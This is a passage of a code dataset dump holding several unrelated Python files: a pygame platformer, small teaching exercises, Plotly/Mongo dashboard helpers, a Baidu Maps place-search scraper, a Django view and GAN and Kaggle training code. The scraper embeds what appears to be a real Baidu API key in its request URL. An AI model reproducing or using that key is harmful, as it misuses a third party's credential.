[210, 70, 1120, 280],\n ]\n\n for level in levels:\n platform = Platform(level[0], level[1])\n platform.rect.x = level[2]\n platform.rect.y = level[3]\n self.platform_list.add(platform)\n\n\nclass Level02(Level):\n def __init__(self):\n\n Level.__init__(self)\n\n self.level_limit = -1000\n\n levels = [[210, 30, 450, 570],\n [210, 30, 850, 420],\n [210, 30, 1000, 520],\n [210, 30, 1120, 280]]\n\n for level in levels:\n platform = Platform(level[0], level[1])\n platform.rect.x = level[2]\n platform.rect.y = level[3]\n self.platform_list.add(platform)\n\n\ndef main():\n pygame.init()\n\n # Set the width and height of the screen [width, height]\n size = (SCREEN_WIDTH, SCREEN_HEIGHT)\n screen = pygame.display.set_mode(size)\n\n pygame.display.set_caption(\"My Game\")\n\n # Create the player\n player = Player()\n\n levels = []\n levels.append(Level01())\n levels.append(Level02())\n current_level_number = 0\n current_level = levels[current_level_number]\n\n player.level = current_level\n\n # Create the sprite group\n active_sprite_list = pygame.sprite.Group()\n\n player.rect.x = 100\n player.rect.y = 100\n\n active_sprite_list.add(player)\n\n # Loop until the user clicks the close button.\n done = False\n\n # Used to manage how fast the screen updates\n clock = pygame.time.Clock()\n\n # -------- Main Program Loop -----------\n while not done:\n # --- Main event loop\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n done = True\n\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT:\n player.go_left()\n elif event.key == pygame.K_RIGHT:\n player.go_right()\n elif event.key == pygame.K_UP:\n player.jump()\n\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_LEFT:\n player.stop()\n elif event.key == pygame.K_RIGHT:\n player.stop()\n\n # --- Game logic should go here\n active_sprite_list.update()\n\n # Update the level\n current_level.update()\n\n if player.rect.right >= 500:\n diff = player.rect.right - 500\n current_level.shift_world(-diff)\n player.rect.right = 500\n\n if player.rect.left <= 120:\n diff = 120 - player.rect.left\n current_level.shift_world(diff)\n player.rect.left = 120\n\n position = player.rect.x + current_level.world_shift\n if position < current_level.level_limit:\n\n # Go to the next level (if there is one)\n if current_level_number < len(levels) - 1:\n current_level_number += 1\n current_level = levels[current_level_number]\n player.level = current_level\n player.rect.left = 120\n\n # --- Screen-clearing code goes here\n\n # Here, we clear the screen to white. Don't put other drawing commands\n # above this, or they will be erased with this command.\n\n # If you want a background image, replace this clear with blit'ing the\n # background image.\n #screen.fill(WHITE)\n\n # --- Drawing code should go here\n current_level.draw(screen)\n active_sprite_list.draw(screen)\n\n # --- Go ahead and update the screen with what we've drawn.\n pygame.display.flip()\n\n # --- Limit to 60 frames per second\n clock.tick(60)\n\n # Close the window and quit.\n pygame.quit()\n\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"source/4_pygame_scroller.py","file_name":"4_pygame_scroller.py","file_ext":"py","file_size_in_byte":6757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"233831540","text":"\"\"\"\nGiven a non-negative integer n, print the nth Fibonacci number.\nDo this by writing a function fib(n) which takes\nthe non-negative integer n and returns the nth Fibonacci number.\n\nDon't use loops, use the flair of recursion instead.\nHowever, you should think about why the recursive method\nis much slower than using loops.\n\"\"\"\n\n\ndef fib(n):\n if n <= 1:\n return n\n else:\n return fib(n - 1) + fib(n - 2)\n\n\ndef main():\n print(\"Please input n element in fibonacci number:\")\n n = int(input())\n\n print(\"Value of \" + str(n) + \" number in sequence is \" + str(fib(n)))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"students/semko_krzysztof/lesson_04_unit_testing/fibonacci_numbers.py","file_name":"fibonacci_numbers.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"348367265","text":"# student = {\n# \"name\": \"Aaron\",\n# \"owns_dog\": False,\n# \"num_courses\": 1,\n# \"favourite_language\": \"Python, C\",\n# \"is_hillarious\": True,\n# 13: \"my favourite number!\"\n# }\n\n# artist = {\n# \"first\": \"Neil\",\n# \"last\": \"Young\",\n# }\n#\n# full_name = artist['first'] + \" \" + artist['last']\n#\n# print(full_name)\n\n# donations = dict(sam=25.0, lena=88.99, chuck=13.0, linus=99.5, stan=150.0, lisa=50.25, harrison=10.0)\n# # DON'T TOUCH PLEASE!\n# for v in donations.values():\n# total_donations += v\n# print(total_donations)\n\n# from random import choice\n# food = choice([\"cheese pizza\", \"quiche\", \"morning bun\", \"gummy bear\", \"tea cake\"])\n\n# bakery_stock = {\n# \"almond croissant\": 12,\n# \"toffee cookie\": 3,\n# \"morning bun\": 1,\n# \"chocolate chunk cookie\": 9,\n# \"tea cake\": 25\n# }\n\n# YOUR CODE GOES BELOW:\n# if food in bakery_stock.keys():\n# print(\"{} left\".format(bakery_stock[food]))\n# else:\n# print(\"We don't make that\")\n\ninventory = {'croissant': 19, 'bagel': 4, 'muffin': 8, 'cake': 1} # DON'T CHANGE THIS LINE!\n\n# Make a copy of inventory and save it to a variable called stock_list USE A DICTIONARY METHOD\nstock_list = {}\nstock_list.update(inventory)\n# print(stock_list)\n# add the value 18 to stock_list under the key \"cookie\"\nnew_stock = dict(cookie=18)\nstock_list.update(new_stock)\n\n# remove 'cake' from stock_list USE A DICTIONARY METHOD\nstock_list.pop('cake')\nprint(stock_list)\n","sub_path":"first_dictionary.py","file_name":"first_dictionary.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"47901649","text":"import yaml\nimport logging\n\n# get configuration file\nwith open(\"config.yaml\") as ymlfile:\n try:\n cfg = yaml.load(ymlfile)['configuration']\n\n except yaml.YAMLError as exc:\n print(exc)\n\n# get logger\n#FORMAT = '%(asctime)s %(name)-12s %(levelname)-8s %(message)s'\n#logging.basicConfig(level=logging.DEBUG, format=FORMAT)\nlogging.basicConfig(level=logging.DEBUG, filemode='w')\nlogger = logging.getLogger()\n\nfh = logging.FileHandler('Results/output.log', mode='w')\nfh.setLevel(logging.DEBUG)\n#formatter = logging.Formatter('%(asctime)s %(name)-12s %(levelname)-8s %(message)s')\n#fh.setFormatter(formatter)\nlogger.addHandler(fh)\n\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"140537332","text":"import pandas as pd\nfrom app.extensions import mongo\nimport numpy as np\nfrom plotly.subplots import make_subplots\nimport plotly.graph_objects as go\n\ndef getdata_from_variable(variablename):\n mydata = mongo.db['data'].find({\"variable_name\" :variablename})\n df = pd.DataFrame(list(mydata))\n return df\n\ndef getvariables():\n myvar = mongo.db['variables'].find()\n df = pd.DataFrame(list(myvar))\n print('varibale = ', df)\n return df\n\ndef getdata(current_variable, current_version):\n mydata = mongo.db[current_version].find({\"info.source\" : \"kr\",\"info.type\":\"calibration\"})\n data = []\n for d in mydata:\n data.append(d['processes'][current_variable])\n df = pd.DataFrame.from_dict(data, orient='columns')\n return df\n\ndef getalldata():\n mydata = mongo.db['data'].find()\n df = pd.DataFrame(list(mydata))\n straxversion = mydata.distinct('strax_version')\n return df\n\ndef getstraxversion():\n mydata = mongo.db['data'].find()\n straxversion = mydata.distinct('strax_version')\n return straxversion\n\n \nimport dash_html_components as html\n\n\ndef make_dash_table(selection, df):\n \"\"\" Return a dash defintion of an HTML table from a Pandas dataframe. \"\"\"\n\n df_subset = df.loc[df[\"NAME\"].isin(selection)]\n table = []\n\n for index, row in df_subset.iterrows():\n rows = []\n rows.append(html.Td([row[\"NAME\"]]))\n rows.append(html.Td([html.Img(src=row[\"IMG_URL\"])]))\n rows.append(html.Td([row[\"FORM\"]]))\n rows.append(\n html.Td([html.A(href=row[\"PAGE\"], children=\"Datasheet\", target=\"_blank\")])\n )\n table.append(html.Tr(rows))\n\n return table\n\n\n\ndef _create_axis(axis_type, variation=\"Linear\", title=None):\n \"\"\"\n Creates a 2d or 3d axis.\n :params axis_type: 2d or 3d axis\n :params variation: axis type (log, line, linear, etc)\n :parmas title: axis title\n :returns: plotly axis dictionnary\n \"\"\"\n\n if axis_type not in [\"3d\", \"2d\"]:\n return None\n\n default_style = {\n \"background\": \"rgb(255, 255, 255)\",\n \"gridcolor\": \"rgb(230, 230, 230)\",\n \"zerolinecolor\": \"rgb(0, 0,0)\",\n }\n\n if axis_type == \"3d\":\n return {\n \"showbackground\": True,\n \"backgroundcolor\": default_style[\"background\"],\n \"gridcolor\": default_style[\"gridcolor\"],\n \"title\": title,\n \"type\": variation,\n \"zerolinecolor\": default_style[\"zerolinecolor\"],\n }\n\n if axis_type == \"2d\":\n return {\n \"backgroundcolor\": \"rgb(255,255,255)\",\n \"gridcolor\": default_style[\"gridcolor\"],\n \"title\": title,\n \"zerolinecolor\": default_style[\"zerolinecolor\"],\n \"color\": \"#000000\",\n } \n\n\ndef _black_out_axis(axis):\n axis[\"showgrid\"] = True\n axis[\"zeroline\"] = True\n axis[\"color\"] = \"rgb(0,0,0)\"\n return axis\n\n\ndef _create_layout(layout_type, xlabel, ylabel):\n \"\"\" Return dash plot layout. \"\"\"\n\n base_layout = {\n \"font\": {\"family\": \"Raleway\", \"size\":18, \"color\":\"#7f7f7f\"},\n \"hovermode\": \"closest\",\n \"margin\": {\"r\": 50, \"t\": 20, \"l\": 100, \"b\": 100},\n \"showlegend\": False,\n }\n\n if layout_type == \"scatter3d\":\n base_layout[\"scene\"] = {\n \"xaxis\": _create_axis(axis_type=\"3d\", title=xlabel),\n \"yaxis\": _create_axis(axis_type=\"3d\", title=ylabel),\n \"zaxis\": _create_axis(axis_type=\"3d\", title=xlabel, variation=\"log\"),\n \"camera\": {\n \"up\": {\"x\": 0, \"y\": 0, \"z\": 1},\n \"center\": {\"x\": 0, \"y\": 0, \"z\": 0},\n \"eye\": {\"x\": 0.08, \"y\": 2.2, \"z\": 0.08},\n },\n }\n\n elif layout_type == \"histogram2d\":\n base_layout[\"xaxis\"] = _black_out_axis(\n _create_axis(axis_type=\"2d\", title=xlabel)\n )\n base_layout[\"yaxis\"] = _black_out_axis(\n _create_axis(axis_type=\"2d\", title=ylabel)\n )\n base_layout[\"plot_bgcolor\"] = \"black\"\n base_layout[\"paper_bgcolor\"] = \"black\"\n base_layout[\"font\"][\"color\"] = \"white\"\n\n elif layout_type == \"scatter\":\n base_layout[\"xaxis\"] = _black_out_axis(\n _create_axis(axis_type=\"2d\", title=xlabel)\n )\n base_layout[\"yaxis\"] = _black_out_axis(\n _create_axis(axis_type=\"2d\", title=ylabel)\n )\n# base_layout[\"xaxis\"] = _create_axis(axis_type=\"2d\", title=xlabel)\n# base_layout[\"yaxis\"] = _create_axis(axis_type=\"2d\", title=ylabel)\n# base_layout[\"plot_bgcolor\"] = \"white\"\n# base_layout[\"plot_bgcolor\"] = \"rgb(255, 255, 255)\"\n# base_layout[\"paper_bgcolor\"] =\"white\"\n #\"rgb(230, 230, 230)\"\n\n return base_layout\n\n\ndef create_plot(\n x,\n xlabel,\n y,\n ylabel,\n error,\n figname\n):\n data = [\n {\n \"mode\":\"markers\",\n \"coloraxis\":\"black\",\n \"x\": x,\n \"y\": y,\n \"error_y\": \n dict(\n type='data', # value of error bar given in data coordinates\n array=error,\n visible=True),\n \"text\": figname\n }\n ]\n layout = _create_layout(\"scatter\", xlabel, ylabel)\n return {\"data\": data, 'layout':layout}\n\ndef create_legend(title, unit):\n return(title + ' [' + unit + ']')\n\ndef create_plot_with_runid(\n x,\n xrunid,\n xlabel,\n y,\n ylabel,\n yunit,\n error,\n figname\n):\n\n fig = make_subplots(rows=1, cols=1)\n # vertical_spacing=0.02 \n x = pd.to_datetime(x, unit='s')\n fig.add_trace(go.Scatter(mode='markers',x=x, y=y, error_y=dict(array=error),xaxis=\"x1\"))\n fig.add_trace(go.Scatter(mode='markers',x=xrunid, y=y, error_y=dict(array=error),xaxis=\"x2\",line=None))\n fig.update_layout(height=500, width=1000,\n yaxis=dict(title= create_legend(ylabel, yunit)),\n xaxis1=dict(position=1, range=[np.min(x), np.max(x)], title=dict(text=xlabel) ) ,\n xaxis2=dict(position =1, range=[np.min(xrunid), np.max(xrunid)], overlaying='x',showgrid=False,title='Run ID'),\n font={\"family\": \"Raleway\", \"size\":18, \"color\":\"black\"},showlegend= False)\n fig[\"data\"][0][\"text\"] = figname\n # layout = _create_layout(\"scatter\", xlabel, ylabel)\n return fig\n#{\"data\": data, 'layout':layout}\n\ndef create_plot_errorx(\n x,\n xlabel,\n y,\n ylabel,\n error,\n errorx,\n figname\n):\n data = [\n {\n \"mode\":\"markers\",\n \"coloraxis\":\"black\",\n \"x\": x,\n \"y\": y,\n \"error_y\": \n dict(\n type='data', # value of error bar given in data coordinates\n array=error,\n visible=True),\n \"error_x\": \n dict(\n type='data', # value of error bar given in data coordinates\n array=errorx,\n visible=True),\n \"text\": figname\n }\n ]\n layout = _create_layout(\"scatter\", xlabel, ylabel)\n return {\"data\": data, 'layout':layout}\n","sub_path":"frontend/app/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"402981643","text":"import torch\nimport torchvision\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.utils.data import DataLoader\nfrom torchvision import datasets\nfrom torchvision import transforms\nfrom torchvision.utils import save_image\nimport numpy as np\nimport datetime\nimport os, sys\n#from matplotlib.pyplot import imshow, imsave\n\nfrom dpwgan import DPWGAN, MultiCategoryGumbelSoftmax\n\nimport pandas as pd\nimport torch\nimport logging\n\nfrom dpwgan import CategoricalDataset\nfrom dpwgan.utils import create_categorical_gan, percentage_crosstab\nfrom torch.autograd import Variable\n\n\ndef create_categorical_generator(noise_dim, hidden_dim, output_dims):\n generator = torch.nn.Sequential(\n torch.nn.Linear(noise_dim, hidden_dim),\n torch.nn.ReLU(),\n MultiCategoryGumbelSoftmax(hidden_dim, output_dims)\n )\n return generator\n\ndef create_categorical_discriminator(noise_dim, hidden_dim, output_dims):\n discriminator = torch.nn.Sequential(\n torch.nn.Linear(sum(output_dims), hidden_dim),\n torch.nn.LeakyReLU(),\n torch.nn.Linear(hidden_dim, 1)\n )\n return discriminator\n\ndef noise_function(n, noise_dim):\n return torch.randn(n, noise_dim)\n\ndef generate(n, noise_dim, generator):\n \"\"\"Generate a synthetic data set using the trained model\n\n Parameters\n ----------\n n : int\n Number of data points to generate\n\n Returns\n -------\n torch.Tensor\n \"\"\"\n noise = noise_function(n, noise_dim)\n fake_sample = generator(noise)\n return fake_sample\n\n# TODO: JKK: let's make this *really* simple ...\n\n\nNOISE_DIM = 10\nHIDDEN_DIM = 20\nSIGMA = 1\nlearning_rate = 1e-3\nepochs = 500\nn_critics = 5\nbatch_size = 128\nweight_clip = 1/HIDDEN_DIM\nsigma = SIGMA\n\ndef generate_data():\n df = pd.DataFrame(\n {'weather': ['sunny']*10000+['cloudy']*10000+['rainy']*10000,\n 'status': ['on time']*8000+['delayed']*2000\n + ['on time']*3000+['delayed']*5000+['canceled']*2000\n + ['on time']*2000+['delayed']*4000+['canceled']*4000}\n )\n return df\n\n\ntorch.manual_seed(123)\nlogger = logging.getLogger('spam_application')\nlogging.basicConfig(level=logging.INFO)\n\nreal_data = generate_data()\ndataset = CategoricalDataset(real_data)\ndata_tensor = dataset.to_onehot_flat()\n\ngenerator = create_categorical_generator(NOISE_DIM, HIDDEN_DIM, dataset.dimensions)\ndiscriminator = create_categorical_discriminator(NOISE_DIM, HIDDEN_DIM, dataset.dimensions)\n\ngenerator_solver = torch.optim.RMSprop(\n generator.parameters(), lr=learning_rate\n)\n\ndiscriminator_solver = torch.optim.RMSprop(\n discriminator.parameters(), lr=learning_rate\n)\n\nepoch_length = len(real_data) / (n_critics * batch_size)\nn_iters = int(epochs * epoch_length)\n\nfor iteration in range(n_iters):\n for _ in range(n_critics):\n # Sample real data\n rand_perm = torch.randperm(data_tensor.size(0))\n samples = data_tensor[rand_perm[:batch_size]]\n real_sample = Variable(samples)\n\n # Sample fake data\n fake_sample = generate(batch_size, NOISE_DIM, generator)\n\n # Score data\n discriminator_real = discriminator(real_sample)\n discriminator_fake = discriminator(fake_sample)\n\n # Calculate discriminator loss\n # Discriminator wants to assign a high score to real data\n # and a low score to fake data\n discriminator_loss = -(\n torch.mean(discriminator_real) -\n torch.mean(discriminator_fake)\n )\n\n discriminator_loss.backward()\n discriminator_solver.step()\n\n # Weight clipping for privacy guarantee\n for param in discriminator.parameters():\n param.data.clamp_(-weight_clip, weight_clip)\n\n # Reset gradient\n generator.zero_grad()\n discriminator.zero_grad()\n\n # Sample and score fake data\n fake_sample = generate(batch_size, NOISE_DIM, generator)\n discriminator_fake = discriminator(fake_sample)\n\n # Calculate generator loss\n # Generator wants discriminator to assign a high score to fake data\n generator_loss = -torch.mean(discriminator_fake)\n\n generator_loss.backward()\n generator_solver.step()\n\n # Reset gradient\n generator.zero_grad()\n discriminator.zero_grad()\n\n # Print training losses\n if int(iteration % epoch_length) == 0:\n epoch = int(iteration / epoch_length)\n logger.info('Epoch {}\\n'\n 'Discriminator loss: {}; '\n 'Generator loss: {}'\n .format(epoch,\n discriminator_loss.data.numpy(),\n generator_loss.data.numpy()))","sub_path":"DeepSpeedExamples/yet_another_MNIST_GAN/ds_mnist_gan2.py","file_name":"ds_mnist_gan2.py","file_ext":"py","file_size_in_byte":4754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"164026543","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\ng=100\nalpha=(20*2*np.pi)/360\n\n\ndef lecture(fichier):\n\n f = open(fichier, 'r')\n t = []\n \n for ligne in f:\n champs = ligne.split(',')\n t.append(int(champs[0].strip()))\n t=np.array(t) \n return t\n \nt = lecture(\"loigalet.csv\") \nd = g*np.sin(alpha)*t**2/2\n\nplt.plot(t,d)\nplt.ylabel('postion y')\nplt.xlabel('temps t')\nplt.show()","sub_path":"GaletFreineur/documents/loi_galet.py","file_name":"loi_galet.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"645994574","text":"from django.shortcuts import get_object_or_404, render\nfrom django.views.generic import ListView\n\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom summit.libs.auth.models import UserProfile, CESU\nfrom summit.apps.projects.models import Project\n\ndef index(request):\n template_name = 'apps/core/index.html'\n\n context = {\n 'pagetitle': 'Home',\n 'title': 'Home page',\n 'bannerTemplate': 'fullscreen',\n 'header': {\n 'heading1': 'Welcome to Summit',\n 'heading2': 'Your New Cooperative Ecosystem Studies Unit Project Management System',\n 'buttons': [\n {\n 'name': ('Your Dashboard' if request.user.is_authenticated\n else 'Current Projects'),\n 'link': (\"summit.libs.auth:cesu_selector\" if request.user.is_authenticated\n else \"summit.apps.projects:project_public_list\"),\n 'uses_reverse': True\n }\n \n ]\n },\n 'cssFiles': [\n ]\n }\n\n return render(request, template_name, context)\n\nclass MainView(ListView):\n template_name = 'apps/core/index.html'\n model = Project\n context_object_name = 'projects'\n\n permission_required = 'summit_projects.add_project'\n permission_denied_message = 'You do not have the correction permissions to access this page.'\n #raise_exception = False\n\n\n\n def get_context_data(self, **kwargs):\n if (self.request.user):\n user = self.request.user\n cesu = self.request.session.get('cesu')\n print(self.request.session.get('cesu_image'))\n\n print(\"session cesu: \" + str(cesu))\n print(user)\n cesu_list = CESU.objects.all()\n\n profile = None\n\n if (user.id):\n try:\n profile = UserProfile.objects.get(user=user)\n except ObjectDoesNotExist:\n profile = None\n\n if profile is not None:\n try:\n profile_cesu = CESU.objects.get(id=profile.assigned_group.id)\n except (ObjectDoesNotExist, AttributeError) as e:\n profile_cesu = None\n else: profile_cesu = None\n\n context = {\n 'cssFiles': [\n 'libs/mdb/DataTables/datatables.min.css',\n 'css/datatables/dashboard.css',\n ],\n 'jsFiles': [\n 'libs/mdb/DataTables/datatables.min.js',\n 'js/libs/auth/cesu_switcher.js'\n ],\n 'header': {\n 'heading1': 'Welcome to Summit',\n 'heading2': 'Your New Cooperative Ecosystem Studies Unit Project Management System',\n 'buttons': [\n {\n 'name': ('Your Dashboard' if self.request.user.is_authenticated\n else 'Current Projects'),\n 'link': (\"summit.libs.auth:cesu_selector\" if self.request.user.is_authenticated\n else \"summit.apps.projects:project_public_list\"),\n 'uses_reverse': True\n }\n \n ]\n },\n 'bannerTemplate': 'fullscreen',\n \"cesu_list\": cesu_list\n\n }\n ctx = super(MainView, self).get_context_data(**kwargs)\n ctx = {**ctx, **context}\n return ctx\n\ndef about(request, name):\n template_name = 'apps/core/about.html'\n\n context = {\n 'name': name,\n 'pagetitle': 'About',\n 'title': 'About the CPCESU',\n 'header': {\n 'background': 'imgs/coverImages/canyon-country-2400x600.jpg',\n },\n }\n\n return render(request, template_name, context)\n","sub_path":"summit/apps/core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"612621813","text":"import requests\nimport json\nimport csv\nimport time\n\ntime_start=time.time()\n\n#获取小区经纬度数据:XiaoquCoords\nfilename = \"coords.csv\"\nXiaoquCoords = []\nqueries = ['地铁站',\n '地铁线路','公交车站',\n '幼儿园','小学','初中',\n '运动健身',\n '休闲娱乐',\n '银行','ATM',\n '购物中心','超市','百货商场','便利店',\n '美食',\n '公园',\n '综合医院']\n\nradius = 10000\nwith open(filename, 'r') as f:\n reader = csv.DictReader(f)\n xiaoqus = [row['小区地址'] for row in reader]\nf.close()\nwith open(filename, 'r') as f:\n reader = csv.DictReader(f)\n ids = [row['id'] for row in reader]\nf.close()\nwith open(filename, 'r') as f:\n reader = csv.DictReader(f)\n lat = [row['lat'] for row in reader]\nf.close()\nwith open(filename, 'r') as f:\n reader = csv.DictReader(f)\n lng = [row['lng'] for row in reader]\nf.close()\nprint(lng)\n\nXiaoquCoords = []\nfor r in range(len(lat)):\n coord = '%s,%s'%(lat[r],lng[r])\n XiaoquCoords.append(coord)\nprint(XiaoquCoords)\n\nfor query in queries:\n rows = []\n for j in range(316,316):\n for i in range(j * 50, (j + 1) * 50 - 1):\n # 对于每个搜索字段求规定radius内\n try:\n XiaoquCoord = XiaoquCoords[i]\n contents = [xiaoqus[i],ids[i]]\n SearchUrl = 'http://api.map.baidu.com/place/v2/search?query=%s&location' \\\n '=%s&radius=%d&output=json&scope=2&filter=sort_name:distance|sort_rule:1&page_size=20&' \\\n 'ak=HRGlosvNHtwcmmUHonaFyAcVr41UzCQG' % (query, XiaoquCoord, radius)\n SearchRes = requests.get(SearchUrl)\n Details = json.loads(SearchRes.text)\n if Details.get('results') != []:\n for k in range(20):\n if k <= len(Details.get('results')) - 1:\n name = Details.get('results')[k].get('name')\n distance = Details.get('results')[k].get('detail_info').get('distance')\n contents.append(name)\n contents.append(distance)\n else:\n name = '无'\n distance = 0\n contents.append(name)\n contents.append(distance)\n else:\n name = '%d米内没有' % (radius)\n distance = 0\n contents.append(name)\n contents.append(distance)\n rows.append(contents)\n except:\n json.decoder.JSONDecodeError\n #headers = ['id','小区地址']\n #for m in range(20):\n # headers.append('距离最近的第%d个%s' % (m+1,query))\n # headers.append('距离最近的第%d个%s的距离' % (m+1,query))\n with open('%s.csv'%(query), 'a') as f:\n f_csv = csv.writer(f, )\n #f_csv.writerow(headers)\n f_csv.writerows(rows)\n\ntime_end=time.time()\nprint('time cost',time_end-time_start,'s')","sub_path":"final/flei.py","file_name":"flei.py","file_ext":"py","file_size_in_byte":3155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"512615959","text":"parallel=True\nfrom abc import ABCMeta, abstractmethod\nimport numpy as np\nimport pandas as pd\nfrom sklearn.metrics import log_loss, roc_auc_score, mean_squared_error, r2_score, confusion_matrix, f1_score, accuracy_score\nfrom sklearn.model_selection import ParameterGrid, StratifiedKFold, GroupKFold, KFold\nimport multiprocessing\nimport shutil\nfrom copy import copy\nimport gc\nfrom scipy.stats.mstats import mquantiles\nfrom tqdm import tqdm\nimport sys\nimport os\nHOME = os.path.expanduser('~')\nsys.path.append(f\"{HOME}/kaggle/data_analysis/library/\")\nfrom parallel_utils import parallel_process\nfrom calculate_utils import round_size\nfrom preprocessing import factorize_categoricals, get_dummies, ordinal_encode, get_ordinal_mapping\nimport category_encoders as ce\n\n\nkaggle = 'home-credit-default-risk'\n\n\nclass Model(metaclass=ABCMeta):\n @abstractmethod\n def train(self):\n pass\n\n @abstractmethod\n def predict(self):\n pass\n\n # @abstractmethod\n def predict_proba(self):\n pass\n\n # @abstractmethod\n def accuracy(self):\n pass\n\n # @abstractmethod\n def cross_val_score(self):\n pass\n\n def sc_metrics(self, y_test, y_pred):\n try:\n if self.metric.count('logloss'):\n score = log_loss(y_test, y_pred)\n elif self.metric == 'auc':\n score = roc_auc_score(y_test, y_pred)\n elif self.metric=='l2':\n score = r2_score(y_test, y_pred)\n elif self.metric=='rmse':\n score = np.sqrt(mean_squared_error(y_test, y_pred))\n elif self.metric=='mse':\n score = np.sqrt(mean_squared_error(y_test, y_pred))\n elif self.metric=='accuracy':\n y_pred_max = np.argmax(y_pred, axis=1) # 最尤と判断したクラスの値にする\n score = sum(y_test == y_pred_max) / len(y_test)\n else:\n print('SCORE CALICULATION ERROR!')\n except ValueError:\n self.logger.info(f\"\"\"\n# ==============================\n# WARNING!!!!!\n# {self.target} is True Only.\n# y_test Unique: {np.unique(y_test)}\n# y_pred Unique: {np.unique(y_pred)}\n# ==============================\n \"\"\")\n return score\n\n def sc_confusion_matrix(self, y_test, y_pred):\n #========================================================================\n # F1Scoreを最大化するポイントで混同行列を算出する\n #========================================================================\n if self.objective=='binary':\n threshold = 0.5\n binary_method = lambda x: 1 if x>=threshold else 0\n def to_binary_f1():\n bi_test = list(map(binary_method, y_test))\n bi_pred = list(map(binary_method, y_pred))\n f1 = f1_score(bi_test, bi_pred)\n return f1\n\n best_f1 = to_binary_f1()\n best_threshold = threshold\n tmp = copy(best_threshold)\n meta1 = 0\n meta2 = 1\n\n # 二分探索でF1 Scoreを最大化する閾値を探る\n while True:\n threshold = (tmp + meta1) / 2\n f1 = to_binary_f1()\n print(f\"Best : {best_f1} | F1 : {f1}\")\n print(f\"Threshold : {threshold} | Tmp : {tmp} | Meta1 : {meta1} | Meta2 : {meta2}\")\n tmp_f1 = copy(f1) # 1つ目の閾値におけるF1を保存しておく\n if f1>best_f1:\n #========================================================================\n # meta1を使い算出した閾値でBest F1を更新したら, 下記を更新して再ループ\n # meta1: stay\n # meta2: 元のtmp\n # tmp : Best F1を更新したthreshold\n #========================================================================\n best_f1 = f1\n best_threshold = threshold\n meta2 = copy(tmp)\n tmp = copy(best_threshold)\n elif f1best_f1:\n #========================================================================\n # meta2を使い算出したthresholdでBest F1を更新したら, 下記を更新して再ループ\n # meta1: 元のtmp\n # meta2: stay\n # tmp : Best F1を更新したthreshold\n #========================================================================\n best_f1 = f1\n best_threshold = threshold\n meta1 = copy(tmp)\n tmp = copy(best_threshold)\n elif f1=f1:\n meta2 = copy(tmp)\n tmp = copy(best_threshold)\n elif tmp_f10:\n if sc_score > self_stop[n_fold]:\n stop_cnt+=1\n stop_score_list.append(sc_score)\n if stop_cnt==3:\n self.cv_score = np.mean(stop_score_list)\n return self\n\n list_score.append(sc_score)\n self.logger.info(f'Fold No: {n_fold} | {self.metric}: {sc_score}')\n\n ' Feature Importance '\n feim_name = f'{n_fold}_importance'\n feim = self.df_feature_importance(feim_name=feim_name)\n\n if len(self.cv_feim) == 0:\n self.cv_feim = feim.copy()\n else:\n self.cv_feim = self.cv_feim.merge(feim, on='feature', how='inner')\n\n self.cv_score = np.mean(list_score)\n self.val_score_list = list_score\n self.prediction = pred_val.values\n\n self.logger.info(f'''\n#========================================================================\n# Train End.''')\n [self.logger.info(f'''\n# Validation No: {i} | {self.metric}: {score}''') for i, score in enumerate(list_score)]\n self.logger.info(f'''\n# Params : {params}\n# CV score : {self.cv_score}\n#======================================================================== ''')\n\n # Parameter Tuningの場合はscoreがあればOK\n if params_tune:\n return self\n\n importance = []\n for fold_no in range(fold):\n if len(importance) == 0:\n importance = self.cv_feim[f'{fold_no}_importance'].values.copy()\n else:\n importance += self.cv_feim[f'{fold_no}_importance'].values\n\n self.cv_feim['avg_importance'] = importance / fold\n self.cv_feim.sort_values(by=f'avg_importance',\n ascending=False, inplace=True)\n self.cv_feim['rank'] = np.arange(len(self.cv_feim))+1\n\n return self\n\n\n def cross_prediction(self, train, test, key, target, fold_type='stratified', fold=5, group_col_name='', params={}, num_boost_round=0, early_stopping_rounds=0, oof_flg=True, self_kfold=False, self_stop=[], comp_name='', scaler=False, self_predict=[]):\n\n if len(self_predict):\n df_base_id = pd.concat([self_predict[key].to_frame(), test.reset_index()[key].to_frame()], axis=0)\n else:\n df_base_id = pd.concat([train.reset_index()[key].to_frame(), test.reset_index()[key].to_frame()], axis=0)\n self.target = target\n list_score = []\n best_iter_list = []\n self.fold_pred_list = []\n self.fold_val_list = []\n self.cv_feim = pd.DataFrame([])\n self.prediction = np.array([])\n val_stack = pd.DataFrame()\n\n self.objective = params['objective']\n if self.objective=='multiclass':\n self.val_pred = np.zeros((len(train), 13))\n else:\n self.val_pred = np.zeros(len(train))\n\n # Y Setting\n y = train[target].copy()\n # if self.objective.count('reg'):\n # y_min = y.min()\n # y -= y_min\n # y = np.log1p(y)\n\n ' KFold '\n if fold_type == 'stratified':\n folds = StratifiedKFold(n_splits=fold, shuffle=True, random_state=self.seed) # 1\n kfold = folds.split(train, y)\n elif fold_type == 'group':\n if group_col_name == 